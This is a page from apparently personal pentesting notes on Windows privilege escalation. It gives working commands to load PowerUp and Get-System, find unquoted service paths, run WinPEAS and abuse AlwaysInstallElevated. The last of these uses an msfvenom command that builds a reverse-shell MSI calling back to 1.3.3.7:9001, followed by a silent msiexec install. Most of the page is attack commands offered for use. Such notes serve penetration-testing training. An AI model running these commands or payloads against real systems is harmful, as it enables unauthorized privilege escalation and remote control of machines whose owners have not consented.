🧙
Pentesting & Red Teaming Notes
  • Windows
    • Recon - Initial Access
    • Privilege Escalation
      • Enable Privs
      • SeBackupPrivilege
      • SeImpersonatePrivilege
      • SeDebugPrivilege
    • Kerberoasting
    • Lateral Movement
    • MSSQL
    • AD Related
    • Bypass-Evasion Techniques
    • Post Exploitation
    • Miscellaneous
    • UAC Bypass
    • Exploits
      • MS03-026 - RPC DCOM
      • MS04-011 - LSASRV
      • MS08-67 - Netapi
      • MS17-010 - Eternalblue
      • CVE-2019-1388
      • CVE-2020-1472 - Zerologon
      • CVE-2020-16938
      • CVE-2021-1675 - PrintNightmare
      • CVE-2022-21999 - SpoolFool
    • Coerced Auth
  • Linux
  • Abusing Active Directory ACLs
    • ReadLAPSPassword
    • WriteDacl
    • GenericWrite
    • ForceChangePassword
    • WriteOwner
  • Port Forwarding - Tunneling
  • Cloud
  • Mobile
  • Malware Development
    • Process Migration
    • Process Hollowing
    • Dynamic API Resolution
    • Suspended Threads
    • PPID Spoofing
    • Thread Stack Spoofing
    • ETW (Event Tracing for Windows)
    • AMSI Bypass
    • Tools
    • Esoteric
Powered by GitBook
On this page
  • PowerShellMafia
  • Unquoted Service Paths
  • WinPeas
  • Seatbelt
  • Always Install Elevated
  1. Windows

Privilege Escalation

PreviousRecon - Initial AccessNextEnable Privs

Last updated 3 years ago

PowerShellMafia

Try to use dev brach always. PowerView has some cool functions to use.

powershell.exe -c "Import-Module C:\Users\Public\PowerUp.ps1; Invoke-AllChecks"
powershell.exe -c "Import-Module C:\Users\Public\Get-System.ps1; Get-System"

Unquoted Service Paths

Let's say we have a system path like below.

C:\Program Files\IObit\Advanced SystemCare\ASCService.exe

Windows will first try execute it like below in the following order

  • c:\program.exe

  • C:\Program Files\IObit\Advanced.exe

  • C:\Program Files\IObit\Advanced SystemCare\ASCService.exe

If we can plant the exe in one of the paths below we can elevate privileges

  • Please note that we need to either have the ability to restart the machine or restart the service. Otherwise it's useless kinda.

Enumerating unquoted service paths

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v

WinPeas

It is a great privilege escalation enumeration tool. Find the releases below and simply execute the binary.

.\winPEASx64_ofs.exe notcolor quiet

Seatbelt

Always Install Elevated

Detecting if the OS is vulnerable,

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

If always install elevated is enabled, queries above should return 1.

Exploiting it is pretty simple. Generate an msi payload,

msfvenom -p windows/shell/reverse_tcp lhost=1.3.3.7 lport=9001 -f msi > shell.msi

Execute it,

msiexec /quiet /qn /i 1.msi

https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Privesc/PowerUp.ps1
https://github.com/carlospolop/PEASS-ng/releases
https://github.com/GhostPack/Seatbelt
https://www.hackingarticles.in/windows-privilege-escalation-alwaysinstallelevated/#:~:text=For%20this%20purpose%2C%20the%20AlwaysInstallElevated,any%20program%20on%20the%20system.